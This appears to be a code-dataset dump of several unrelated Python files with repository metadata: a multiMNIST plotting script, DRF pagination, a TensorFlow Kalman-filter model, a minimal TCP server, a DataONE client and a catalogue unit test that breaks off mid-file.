| 14.605263 | 49 | 0.533333 | 87 | 555 | 3.402299 | 0.574713 | 0.02027 | 0.02027 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.124661 | 0.335135 | 555 | 37 | 50 | 15 | 0.677507 | 0.192793 | 0 | 0.272727 | 0 | 0 | 0.129841 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.181818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cd0e0ae6fade5e80f9f3332ac23be40551b8667 | 6,344 | py | Python | multiMNIST/display_result.py | kelvin95/EPOSearch | 020f0a8890437449dd7bb37534697aa9f71e8305 | [
"MIT"
] | null | null | null | multiMNIST/display_result.py | kelvin95/EPOSearch | 020f0a8890437449dd7bb37534697aa9f71e8305 | [
"MIT"
] | null | null | null | multiMNIST/display_result.py | kelvin95/EPOSearch | 020f0a8890437449dd7bb37534697aa9f71e8305 | [
"MIT"
] | null | null | null | import numpy as np
import pickle as pkl
import os
import matplotlib.pyplot as plt
from brokenaxes import brokenaxes
from latex_utils import latexify
baseline = "indiv"
methods = [
# "epo",
# "pmtl",
"linscalar",
# "gradnorm",
"gradortho",
"gradalign",
# "gradvacc",
# "graddrop",
# "itmtl",
# "mgda",
# "pcgrad",
# "graddrop_deterministic",
# "graddrop_random",
]
markers = {"epo": "*",
"pmtl": "^",
"linscalar": "s",
"gradnorm": "v",
"graddrop":"1",
"itmtl":"p",
"mgda":"+",
"pcgrad":"D",
"indiv": "o"}
msz = {"epo": 45,
"pmtl": 30,
"linscalar": 25,
"gradnorm": 30,
"graddrop":30,
"itmtl":30,
"mgda":30,
"pcgrad":30,
"indiv": "o"}
datasets = ["mnist",
"fashion",
"fashion_and_mnist"
]
model = 'lenet'
niters, nprefs = 100, 5
folder = f"results"
data = dict()
for dataset in datasets:
print(dataset)
data[dataset] = dict()
for method in [baseline] + methods:
print(f"\t{method}")
file_pfx = f"{method}_{dataset}_{model}_{niters}"
file_sfx = "" if method == 'individual' else f"_{nprefs}_from_0-{nprefs-1}"
file = file_pfx + file_sfx + ".pkl"
results = pkl.load(open(os.path.join(folder, file), 'rb'))
last_ls, last_acs, rs = [], [], []
for i in results:
r, res = results[i]["r"], results[i]["res"]
ls, acs = res["training_losses"], res["training_accuracies"]
rs.append(r)
last_ls.append(ls[-1])
last_acs.append(acs[-1])
last_ls, last_acs = np.asarray(last_ls), np.asarray(last_acs)
data[dataset][method] = {"last_ls": last_ls,
"last_acs": last_acs,
"rs": rs}
if method == "linscalar":
data[dataset]["rlens"] = [1.2 * np.linalg.norm(l) for l in last_ls]
data[dataset]["max1"] = np.max(last_ls, axis=0)
if dataset == "fashion":
print(last_ls)
print(data[dataset]["max1"])
if method == "epo":
data[dataset]["max2"] = np.max(last_ls, axis=0)
data[dataset]["rs"] = rs
if dataset == "fashion":
print(last_ls)
if method == "individual":
data[dataset]["baseline_loss"] = []
data[dataset]["baseline_acc"] = []
for i, r in enumerate(rs):
if r[0] == 0:
lxs, lys = [0, 10], [min(last_ls[i]), min(last_ls[i])]
axs, ays = [0, 1], [max(last_acs[i]), max(last_acs[i])]
else:
lxs, lys = [min(last_ls[i]), min(last_ls[i])], [0, 10]
axs, ays = [max(last_acs[i]), max(last_acs[i])], [0, 1]
data[dataset]["baseline_loss"].append((lxs, lys))
data[dataset]["baseline_acc"].append((axs, ays))
import pdb; pdb.set_trace()
# latexify(fig_width=2.25, fig_height=1.5)
from matplotlib import rc
rc("text", usetex=False)
for dataset in datasets:
fig = plt.figure()
# max1x, max1y = data[dataset]["max1"]
# max2x, max2y = data[dataset]["max2"]
max2x = 0.7
max2y = 0.7
max1x = 1.0
max1y = 1.0
ax = brokenaxes(xlims=((-.05, max2x + .05), (max1x - .1, max1x + .15)),
ylims=((-.05, max2y + .05), (max1y - .1, max1y + .1)),
hspace=0.05, wspace=0.05, fig=fig)
ax.set_xlabel(r"task 1 loss")
ax.set_ylabel(r"task 2 loss")
for i, (xs, ys) in enumerate(data[dataset]["baseline_loss"]):
label = "baseline\nloss" if i == 0 and dataset == "fashion" else ""
ax.plot(xs, ys, lw=2, alpha=0.4, c='k')
colors = []
for i, (r, l) in enumerate(zip(data[dataset]["rs"],
data[dataset]["rlens"])):
label = r"$r^{-1}$ Ray" if i == 0 and dataset == "fashion" else ""
r_inv = np.sqrt(1 - r**2)
lines = ax.plot([0, .9 * l * r_inv[0]], [0, .9 * l * r_inv[1]],
lw=1, alpha=0.5, ls='--', dashes=(10, 2), label=label)
colors.append(lines[0][0].get_color())
if i in range(1, len(data[dataset]["rs"]) - 1):
ax0 = 0.85 * l * r_inv[0]
ay0 = 0.85 * l * r_inv[1]
else:
ax0 = 0.9 * r_inv[0]
ay0 = 0.9 * r_inv[1]
ax.arrow(ax0, ay0, .05 * r_inv[0], .05 * r_inv[1],
color=colors[-1], lw=1, head_width=.04, alpha=0.5)
for method in methods:
print(method)
last_ls = data[dataset][method]["last_ls"]
s = 20 if method == "epo" else 20
ax.scatter(last_ls[:, 0], last_ls[:, 1], marker=markers[method],
c=colors, s=msz[method] , label=method)
if dataset in ["mnist", "fashion_and_mnist"]:
ax.legend()
fig.savefig(f"figures/{dataset}_loss.pdf")
# latexify(fig_width=2.25, fig_height=1.5)
from matplotlib import rc
rc("text", usetex=False)
for dataset in datasets:
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_xlabel(r"task 1 accuracies")
ax.set_ylabel(r"task 2 accuracies")
# Hide the right and top spines
ax.spines['left'].set_visible(False)
ax.spines['bottom'].set_visible(False)
# Only show ticks on the left and bottom spines
ax.yaxis.set_ticks_position('right')
ax.xaxis.set_ticks_position('top')
ax.yaxis.set_label_position('right')
ax.xaxis.set_label_position('top')
for i, (xs, ys) in enumerate(data[dataset]["baseline_acc"]):
label = "baseline" if i == 0 and dataset == "mnist" else ""
ax.plot(xs, ys, lw=2, alpha=0.4, c='k', label=label)
for method in methods:
last_acs = data[dataset][method]["last_acs"]
label = method #if dataset == "fashion_and_mnist" else ""
s = 30 if method == "epo" else 30
ax.scatter(last_acs[:, 0], last_acs[:, 1], marker=markers[method],
c=colors, s=msz[method], label=label)
if dataset in ["mnist", "fashion_and_mnist"]:
ax.legend()
fig.savefig(f"figures/{dataset}_acc.pdf")
plt.show()
| 35.049724 | 83 | 0.51466 | 842 | 6,344 | 3.764846 | 0.218527 | 0.069401 | 0.035962 | 0.012618 | 0.318612 | 0.278233 | 0.211987 | 0.197476 | 0.170978 | 0.147003 | 0 | 0.040534 | 0.315574 | 6,344 | 180 | 84 | 35.244444 | 0.689544 | 0.062579 | 0 | 0.154362 | 0 | 0 | 0.123461 | 0.019059 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.060403 | 0 | 0.060403 | 0.040268 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cd259722e42f71cb19331be9d7293420eff0873 | 2,187 | py | Python | rental/pagination.py | sunscrapers/restonomicon.pl | 56a167cd4a07520a66377e7d899d8f1759f00e3d | [
"MIT"
] | null | null | null | rental/pagination.py | sunscrapers/restonomicon.pl | 56a167cd4a07520a66377e7d899d8f1759f00e3d | [
"MIT"
] | null | null | null | rental/pagination.py | sunscrapers/restonomicon.pl | 56a167cd4a07520a66377e7d899d8f1759f00e3d | [
"MIT"
] | null | null | null | from collections import OrderedDict
from rest_framework.pagination import LimitOffsetPagination
from rest_framework.response import Response
from rest_framework.utils.urls import remove_query_param, replace_query_param
class HeaderLimitOffsetPagination(LimitOffsetPagination):
def paginate_queryset(self, queryset, request, view=None):
self.use_envelope = False
if str(request.GET.get("envelope")).lower() in ["true", "1"]:
self.use_envelope = True
return super().paginate_queryset(queryset, request, view)
def get_paginated_response(self, data):
next_url = self.get_next_link()
previous_url = self.get_previous_link()
first_url = self.get_first_link()
last_url = self.get_last_link()
links = []
for label, url in (
("first", first_url),
("next", next_url),
("previous", previous_url),
("last", last_url),
):
if url is not None:
links.append('<{}>; rel="{}"'.format(url, label))
headers = {"Link": ", ".join(links)} if links else {}
if self.use_envelope:
return Response(
OrderedDict(
[
("count", self.count),
("first", first_url),
("next", next_url),
("previous", previous_url),
("last", last_url),
("results", data),
]
),
headers=headers,
)
return Response(data, headers=headers)
def get_first_link(self):
if self.offset <= 0:
return None
url = self.request.build_absolute_uri()
return remove_query_param(url, self.offset_query_param)
def get_last_link(self):
if self.offset + self.limit >= self.count:
return None
url = self.request.build_absolute_uri()
url = replace_query_param(url, self.limit_query_param, self.limit)
offset = self.count - self.limit
return replace_query_param(url, self.offset_query_param, offset)
| 35.274194 | 77 | 0.566529 | 232 | 2,187 | 5.107759 | 0.271552 | 0.053165 | 0.033755 | 0.043038 | 0.274262 | 0.214346 | 0.214346 | 0.15865 | 0.091139 | 0.091139 | 0 | 0.001362 | 0.328761 | 2,187 | 61 | 78 | 35.852459 | 0.805858 | 0 | 0 | 0.230769 | 0 | 0 | 0.039781 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cd790991b2e8bb7fe6665f9e39b218f772a44ee | 12,076 | py | Python | elbow/models/time_series.py | davmre/elbow | 5ca2733068dc367404ad48d4e2c7f61f9901216a | [
"BSD-3-Clause"
] | 93 | 2016-10-04T23:15:54.000Z | 2021-01-10T20:31:36.000Z | elbow/models/time_series.py | davmre/bayesflow | 5ca2733068dc367404ad48d4e2c7f61f9901216a | [
"BSD-3-Clause"
] | 1 | 2017-02-22T11:29:15.000Z | 2017-02-22T21:13:36.000Z | elbow/models/time_series.py | davmre/elbow | 5ca2733068dc367404ad48d4e2c7f61f9901216a | [
"BSD-3-Clause"
] | 19 | 2016-10-26T08:19:39.000Z | 2019-12-19T02:26:43.000Z | import numpy as np
import tensorflow as tf
import elbow.util as util
from elbow import ConditionalDistribution
import scipy.stats
from elbow.gaussian_messages import MVGaussianMeanCov, reverse_message, forward_message
from elbow.parameterization import unconstrained, psd_matrix, psd_diagonal
class LinearGaussian(ConditionalDistribution):
def __init__(self, shape, K, prior_mean, prior_cov,
transition_mat, transition_mean, transition_cov,
observation_mat=None, observation_mean=None, observation_cov=None,
**kwargs):
# a linear Gaussian state-space model (aka Kalman filter) with dimensions
# T: number of time steps
# D: dimension of hidden state
# K: dimension of output
# We allow K=0 (implied by observation_mat=None) in which case the model is
# just a Markov chain -- this can be useful together or in conjunction with
# non-Gaussian (e.g., neural/VAE) observation models.
self.T, self.D = shape
self.K = K
if observation_mean is None:
self._flag_no_obs = True
observation_mean = tf.zeros((self.D,), dtype=tf.float32)
observation_mat = tf.constant(np.float32(np.eye(self.D)))
observation_cov = tf.zeros((self.D, self.D), dtype=tf.float32)
super(LinearGaussian, self).__init__(prior_mean=prior_mean, prior_cov=prior_cov,
transition_mat=transition_mat,
transition_mean=transition_mean,
transition_cov=transition_cov,
observation_mat=observation_mat,
observation_mean=observation_mean,
observation_cov=observation_cov,
shape=shape, **kwargs)
def inputs(self):
return {"prior_mean": unconstrained, "prior_cov": psd_matrix,
"transition_mat": unconstrained, "transition_mean": unconstrained, "transition_cov": psd_matrix,
"observation_mat": unconstrained, "observation_mean": unconstrained, "observation_cov": psd_matrix}
def _compute_shape(self, prior_mean_shape, prior_cov_shape,
transition_mat_shape, transition_mean_shape, transition_cov_shape,
observation_mat_shape=None, observation_mean_shape=None, observation_cov_shape=None):
D1, = prior_mean_shape
D2, D3 = prior_cov_shape
D4, D5 = transition_mat_shape
D6, = transition_mean_shape
D7, D8 = transition_cov_shape
assert(D1 == D2 == D3 == D4 == D5 == D6 == D7 == D8)
if observation_mat_shape is not None:
K1, D9 = observation_mat_shape
K2, = observation_mean_shape
K3, K4 = observation_cov_shape
assert(D9 == D1)
assert(K1 == K2 == K3 == K4)
else:
K1 = D1
return (self.T, K1)
def _sample_and_entropy(self, **input_samples):
sampled = self._sample(**input_samples)
entropy = -self._logp(result=sampled, **input_samples)
return sampled, entropy
def _sample(self, prior_mean, prior_cov,
transition_mat, transition_mean, transition_cov,
observation_mat=None, observation_mean=None, observation_cov=None):
transition_mean = tf.reshape(transition_mean, shape=(self.D, 1))
transition_eps = tf.random_normal(shape=(self.T, self.D))
transition_epses = [tf.reshape(n, shape=(self.D, 1)) for n in tf.unpack(transition_eps)]
prior_mean = tf.reshape(prior_mean, shape=(self.D, 1))
prior_cov_L = tf.cholesky(prior_cov)
state = prior_mean + tf.matmul(prior_cov_L, transition_epses[0])
transition_cov_L = tf.cholesky(transition_cov)
if not self._flag_no_obs:
observation_cov_L = tf.cholesky(observation_cov)
obs_eps = tf.random_normal(shape=(self.T, self.K))
obs_epses = [tf.reshape(n, shape=(self.K, 1)) for n in tf.unpack(obs_eps)]
observation_mean = tf.reshape(observation_mean, shape=(self.K, 1))
output = []
hidden = []
for t in range(self.T):
if not self._flag_no_obs:
pred_obs = tf.matmul(observation_mat, state) + observation_mean
output.append(pred_obs + tf.matmul(observation_cov_L, obs_epses[t]))
else:
output.append(state)
hidden.append(state)
if t < self.T-1:
state_noise = transition_mean + tf.matmul(transition_cov_L, transition_epses[t+1])
state = tf.matmul(transition_mat, state) + state_noise
self._sampled_hidden = hidden
return tf.pack(tf.squeeze(output))
def _logp(self, result, prior_mean, prior_cov,
transition_mat, transition_mean, transition_cov,
observation_mat=None, observation_mean=None, observation_cov=None):
# define the Kalman filtering calculation within the TF graph
if not self._flag_no_obs:
observation_mean = tf.reshape(observation_mean, (self.K, 1))
transition_mean = tf.reshape(transition_mean, (self.D, 1))
pred_mean = tf.reshape(prior_mean, (self.D, 1))
pred_cov = prior_cov
filtered_means = []
filtered_covs = []
step_logps = []
observations = tf.unpack(result)
for t in range(self.T):
obs_t = tf.reshape(observations[t], (self.K, 1))
if not self._flag_no_obs:
tmp = tf.matmul(observation_mat, pred_cov)
S = tf.matmul(tmp, tf.transpose(observation_mat)) + observation_cov
# TODO optimize this to not use an explicit matrix inverse
#Sinv = tf.matrix_inverse(S)
#gain = tf.matmul(pred_cov, tf.matmul(tf.transpose(observation_mat), Sinv))
# todo worth implementing cholsolve explicitly?
gain = tf.matmul(pred_cov, tf.transpose(tf.matrix_solve(S, observation_mat)))
y = obs_t - tf.matmul(observation_mat, pred_mean) - observation_mean
updated_mean = pred_mean + tf.matmul(gain, y)
updated_cov = pred_cov - tf.matmul(gain, tmp)
else:
updated_mean = obs_t
updated_cov = tf.zeros_like(pred_cov)
S = pred_cov
y = obs_t - pred_mean
step_logp = util.dists.multivariate_gaussian_log_density(y, 0, S)
filtered_means.append(updated_mean)
filtered_covs.append(updated_cov)
step_logps.append(step_logp)
if t < self.T-1:
pred_mean = tf.matmul(transition_mat, updated_mean) + transition_mean
pred_cov = tf.matmul(transition_mat, tf.matmul(updated_cov, tf.transpose(transition_mat))) + transition_cov
self.filtered_means = filtered_means
self.filtered_covs = filtered_covs
self.step_logps = tf.pack(step_logps)
logp = tf.reduce_sum(self.step_logps)
return logp
class LinearGaussianChainCRF(ConditionalDistribution):
# TODO this has not been updated from the old-style QDistribution
# so is currently totally broken
def __init__(self, shape,
transition_matrices,
step_noise_means,
step_noise_covs,
unary_means,
unary_variances, **kwargs):
super(LinearGaussianChainCRF, self).__init__(transition_matrices=transition_matrices, step_noise_means=step_noise_means, step_noise_covs=step_noise_covs, unary_means=unary_means, unary_variances=unary_variances, shape=shape, **kwargs)
def inputs(self):
return {"transition_matrices": unconstrained, "step_noise_means": unconstrained, "step_noise_covs": psd_diagonal, "unary_means": None, "unary_variances": None}
def _sample_and_entropy(self, transition_matrices,
step_noise_means,
step_noise_covs,
unary_means,
unary_variances):
T, d = self.shape
upwards_means = tf.unpack(unary_means)
upwards_vars = tf.unpack(unary_variances)
unary_factors = [MVGaussianMeanCov(mean, tf.diag(vs)) for (mean, vs) in zip(upwards_means, upwards_vars)]
# transition_matrices is either a d x d matrix, or a T x d x d tensor
if len(transition_matrices.get_shape()) == 2:
transition_matrices = [transition_matrices for i in range(T)]
# step noise mean is either a (d,)-vector or a T x d matrix
if len(step_noise_means.get_shape()) == 1:
step_noise_means = [step_noise_means for i in range(T)]
# step noise cov is either a d x d matrix or a T x d x d tensor
if len(step_noise_covs.get_shape()) == 2:
step_noise_covs = [step_noise_covs for i in range(T)]
step_noise_factors = [MVGaussianMeanCov(step_noise_means[t], step_noise_covs[t]) for t in range(T)]
back_filtered, logZ = self._pass_messages_backwards(transition_matrices,
step_noise_factors,
unary_factors)
self._back_filtered = back_filtered
self._logZ = logZ
eps = tf.random_normal(shape=self.shape)
sample, entropy = self._sample_forward(back_filtered, transition_matrices,
step_noise_factors, eps)
return sample, entropy
def _entropy(self):
raise Exception("can't compute entropy without a sample...")
def _sample(self):
raise Exception("shouldn't try to sample a chainCRF without entropy...")
def _pass_messages_backwards(self, transition_matrices, step_noise_factors, unary_factors):
messages = []
T, d = self.shape
back_filtered = unary_factors[T-1]
messages.append(back_filtered)
logZ = 0.0
for t in np.arange(T-1)[::-1]:
back_filtered_pred = reverse_message(back_filtered,
transition_matrices[t],
step_noise_factors[t])
logZ += back_filtered_pred.multiply_density_logZ(unary_factors[t])
back_filtered = back_filtered_pred.multiply_density(unary_factors[t])
messages.append(back_filtered)
messages = messages[::-1]
return messages, logZ
def _sample_forward(self, back_filtered, transition_matrices,
step_noise_factors, eps):
samples = []
T, d = self.shape
epses = tf.unpack(eps)
sampling_dist = back_filtered[0]
z_i = sampling_dist.sample(epses[0])
samples.append(z_i)
sampling_dists = [sampling_dist]
entropies = [sampling_dist.entropy()]
for t in np.arange(1, T):
pred_mean = tf.matmul(transition_matrices[t-1], z_i)
noise = step_noise_factors[t-1]
incoming = MVGaussianMeanCov(noise.mean() + pred_mean, noise.cov())
sampling_dist = back_filtered[t].multiply_density(incoming)
sampling_dists.append(sampling_dist)
z_i = sampling_dist.sample(epses[t])
entropies.append(sampling_dist.entropy())
samples.append(z_i)
self.sampling_dists = sampling_dists
self.entropies = entropies
entropy = tf.reduce_sum(tf.pack(entropies))
sample = tf.reshape(tf.squeeze(tf.pack(samples)), self.shape)
return sample, entropy
| 42.223776 | 242 | 0.602103 | 1,423 | 12,076 | 4.829937 | 0.154603 | 0.035356 | 0.018333 | 0.027499 | 0.296668 | 0.223629 | 0.150153 | 0.103012 | 0.079732 | 0.079732 | 0 | 0.007848 | 0.314177 | 12,076 | 285 | 243 | 42.37193 | 0.822024 | 0.074611 | 0 | 0.166667 | 0 | 0 | 0.024917 | 0 | 0 | 0 | 0 | 0.003509 | 0.015152 | 1 | 0.065657 | false | 0.010101 | 0.035354 | 0.010101 | 0.156566 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cd7f195a00e7374763e0bd2f25ffaede27cf631 | 300 | py | Python | src/docs/net/ip/tcp_server.py | fujiawei-dev/protocols-notes | 4f5b2dd6f7b5a7f2d1260312972898be0f123ff5 | [
"MIT"
] | null | null | null | src/docs/net/ip/tcp_server.py | fujiawei-dev/protocols-notes | 4f5b2dd6f7b5a7f2d1260312972898be0f123ff5 | [
"MIT"
] | null | null | null | src/docs/net/ip/tcp_server.py | fujiawei-dev/protocols-notes | 4f5b2dd6f7b5a7f2d1260312972898be0f123ff5 | [
"MIT"
] | null | null | null | """
Date: 2022.04.03 16:48:45
LastEditors: Rustle Karl
LastEditTime: 2022.04.03 20:21:38
"""
import socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("0.0.0.0", 9090))
server.listen(50000)
while True:
client, client_address = server.accept()
client.send("OK")
| 18.75 | 58 | 0.71 | 48 | 300 | 4.375 | 0.6875 | 0.028571 | 0.07619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156489 | 0.126667 | 300 | 15 | 59 | 20 | 0.645038 | 0.28 | 0 | 0 | 0 | 0 | 0.043269 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cdfdb149027f845e15333f523f0c024a1f4b256 | 6,913 | py | Python | lib_client/src/d1_client/d1client.py | DataONEorg/d1_python | dfab267c3adea913ab0e0073ed9dc1ee50b5b8eb | [
"Apache-2.0"
] | 15 | 2016-10-28T13:56:52.000Z | 2022-01-31T19:07:49.000Z | lib_client/src/d1_client/d1client.py | DataONEorg/d1_python | dfab267c3adea913ab0e0073ed9dc1ee50b5b8eb | [
"Apache-2.0"
] | 56 | 2017-03-16T03:52:32.000Z | 2022-03-12T01:05:28.000Z | lib_client/src/d1_client/d1client.py | DataONEorg/d1_python | dfab267c3adea913ab0e0073ed9dc1ee50b5b8eb | [
"Apache-2.0"
] | 11 | 2016-05-31T16:22:02.000Z | 2020-10-05T14:37:10.000Z | #!/usr/bin/env python
# This work was created by participants in the DataONE project, and is
# jointly copyrighted by participating institutions in DataONE. For
# more information on DataONE, see our web site at http://dataone.org.
#
# Copyright 2009-2019 DataONE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import logging
import pathlib
import d1_common.const
import d1_common.object_format_cache
import d1_common.system_metadata
import d1_common.type_conversions
import d1_common.types.exceptions
import d1_client.cnclient
import d1_client.cnclient_2_0
import d1_client.mnclient
import d1_client.mnclient_1_2
import d1_client.mnclient_2_0
BASE_URL_TO_NODE_ID_DICT = {}
class DataONEClient(
d1_client.mnclient_2_0.MemberNodeClient_2_0,
d1_client.cnclient_2_0.CoordinatingNodeClient_2_0,
):
"""Perform high level operations against the DataONE infrastructure.
The other Client classes are specific to CN or MN and to architecture version. This
class provides a more abstract interface that can be used for interacting with any
DataONE node regardless of type and version.
"""
def __init__(self, *args, **kwargs):
"""See baseclient.DataONEBaseClient for args."""
super().__init__(*args, **kwargs)
self._log = logging.getLogger(__name__)
self.object_format_cache = d1_common.object_format_cache.ObjectFormatListCache()
def create_sciobj(
self, pid, format_id, sciobj, vendor_specific_dict=None, **sysmeta_dict
):
"""Create a Science Object on a Memeber Node.
Wrapper for MNStorage.create() that includes semi-automatic generation of System
Metadata.
Args:
pid: str
Persistent Identifier.
format_id: str
formatId of the Science Object.
sciobj: str, bytes or file-like stream
str: Path to file
bytes: Bytes
file-like stream: lxml.etree of XML doc to validate
vendor_specific_dict: dict
Pass additional, vendor specific parameters.
**sysmeta_dict: dict
Parameters to customize the System Metadata.
See also:
d1_common.system_metadata.generate_system_metadata_pyxb()
"""
sciobj_stream = self._resolve_to_stream(sciobj)
return self.create(
pid,
sciobj_stream,
self.create_sysmeta(pid, format_id, sciobj_stream, **sysmeta_dict),
vendor_specific_dict,
)
def _resolve_to_stream(self, sciobj):
"""
Args:
sciobj: str, bytes or file-like stream
str: Path to file
bytes: Bytes
file-like stream: lxml.etree of XML doc to validate
Returns:
stream
"""
if isinstance(sciobj, io.IOBase):
return sciobj
elif isinstance(sciobj, bytes):
return io.BytesIO(sciobj)
elif isinstance(sciobj, pathlib.Path):
return sciobj.open("rb")
else:
raise ValueError("Unable to create stream")
def create_sysmeta(self, pid, format_id, sciobj_stream, **sysmeta_dict):
if not self.object_format_cache.is_valid_format_id(format_id):
raise d1_common.types.exceptions.InvalidSystemMetadata(
0, "Unknown formatId: {}".format(format_id)
)
primary_str, equivalent_set = self.auth_subj_tup
node_id = self.get_node_id()
return d1_common.system_metadata.generate_system_metadata_pyxb(
pid,
format_id,
sciobj_stream,
primary_str,
primary_str,
node_id,
**sysmeta_dict
)
def get_node_id(self):
if self.base_url not in BASE_URL_TO_NODE_ID_DICT:
BASE_URL_TO_NODE_ID_DICT[
self.base_url
] = self.getCapabilities().identifier.value()
return BASE_URL_TO_NODE_ID_DICT[self.base_url]
def get_api_major_by_base_url(
base_url=d1_common.const.URL_DATAONE_ROOT, *client_arg_list, **client_arg_dict
):
"""Read the Node document from a node and return an int containing the latest D1 API
version supported by the node.
The Node document can always be reached through the v1 API and will list services
for v1 and any later APIs versions supported by the node.
"""
api_major = 0
client = d1_client.mnclient.MemberNodeClient(
base_url, *client_arg_list, **client_arg_dict
)
node_pyxb = client.getCapabilities()
for service_pyxb in node_pyxb.services.service:
if service_pyxb.available:
api_major = max(api_major, int(service_pyxb.version[-1]))
return api_major
def get_client_type(d1_client_obj):
if isinstance(d1_client_obj, d1_client.mnclient.MemberNodeClient):
return "mn"
elif isinstance(d1_client_obj, d1_client.cnclient.CoordinatingNodeClient):
return "cn"
else:
assert False, "Unable to determine d1_client type"
def get_version_tag_by_d1_client(d1_client_obj):
api_major, api_minor = d1_client_obj.api_version_tup
return d1_common.type_conversions.get_version_tag(api_major)
def get_mn_client_class_by_version_tag(api_major):
api_major = str(api_major)
if api_major in ("v1", "1", 1):
return d1_client.mnclient_1_2.MemberNodeClient_1_2
elif api_major in ("v2", "2", 2):
return d1_client.mnclient_2_0.MemberNodeClient_2_0
else:
raise ValueError("Unknown DataONE API version tag: {}".format(api_major))
def get_client_class(api_major=2, node_type="mn"):
"""Get a DataONEClient based class that can be used for creating clients for use
with a node of the given ``node_type`` that supports the DataONE API with the given
``api_major``.
Args:
api_major: str or int
'v1', '1' or 1
'v2', '2' or 2
node_type: str
mn: Member Node
cn: Coordinating Node
Returns:
DataONEClient based class
"""
if node_type.lower == "mn":
return get_mn_client_class_by_version_tag(api_major)
elif node_type.lower == "cn":
return d1_client.cnclient_2_0.CoordinatingNodeClient_2_0
else:
raise ValueError("Unknown node type: {}".format(node_type))
| 33.076555 | 88 | 0.672356 | 924 | 6,913 | 4.778139 | 0.261905 | 0.03624 | 0.028992 | 0.011778 | 0.245074 | 0.19026 | 0.14496 | 0.129558 | 0.07248 | 0.042582 | 0 | 0.017127 | 0.256763 | 6,913 | 208 | 89 | 33.235577 | 0.842156 | 0.368581 | 0 | 0.13 | 0 | 0 | 0.037562 | 0 | 0 | 0 | 0 | 0 | 0.01 | 1 | 0.1 | false | 0 | 0.13 | 0 | 0.38 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ce28045195119b03b6a70cb5dc288a624a6fad1 | 2,139 | py | Python | tests/unit/model/test_catalogo.py | douglasdcm/easy_db | 25a3b2fa51dda484cde7a6aa27f26e8ad6d0c827 | [
"MIT"
] | null | null | null | tests/unit/model/test_catalogo.py | douglasdcm/easy_db | 25a3b2fa51dda484cde7a6aa27f26e8ad6d0c827 | [
"MIT"
] | null | null | null | tests/unit/model/test_catalogo.py | douglasdcm/easy_db | 25a3b2fa51dda484cde7a6aa27f26e8ad6d0c827 | [
"MIT"
] | null | null | null | from src.model.catalogo_curso import CatalogoCurso
from src.model.curso import Curso
from src.model.materia import Materia
class TestCatalogo:
curso = "marcenaria"
materia_1 = "prego"
materia_2 = "parafuso"
materia_3 = "martelo"
def setup_method(self, method):
self.catalogo = CatalogoCurso()
self.catalogo.limpa_catalogo()
def teardown_method(self, method):
self.catalogo.limpa_catalogo()
def test_singleton_funciona(self):
catalogo_1 = CatalogoCurso()
catalogo_2 = CatalogoCurso()
assert catalogo_1 == catalogo_2
def test_limpa_catalogo(self):
self._cria_curso()
self._cria_curso(curso="pedreiro")
expected = list()
self.catalogo.limpa_catalogo()
actual = self.catalogo.pega_cursos()
assert actual == expected
def test_remove_curso_do_catalogo(self):
curso_1 = self._cria_curso()
curso_2 = self._cria_curso(curso="pedreiro")
expected = [curso_1]
self.catalogo.remove_curso(curso_2)
actual = self.catalogo.pega_cursos()
assert actual == expected
def test_catalogo_vazio_retorna_lista_vazia(self):
expected = list()
actual = self.catalogo.pega_cursos()
assert actual == expected
def test_adiciona_dois_cursos_no_catalogo(self):
curso_1 = self._cria_curso()
curso_2 = self._cria_curso("pedreiro")
expected = [curso_1, curso_2]
actual = self.catalogo.pega_cursos()
assert actual == expected
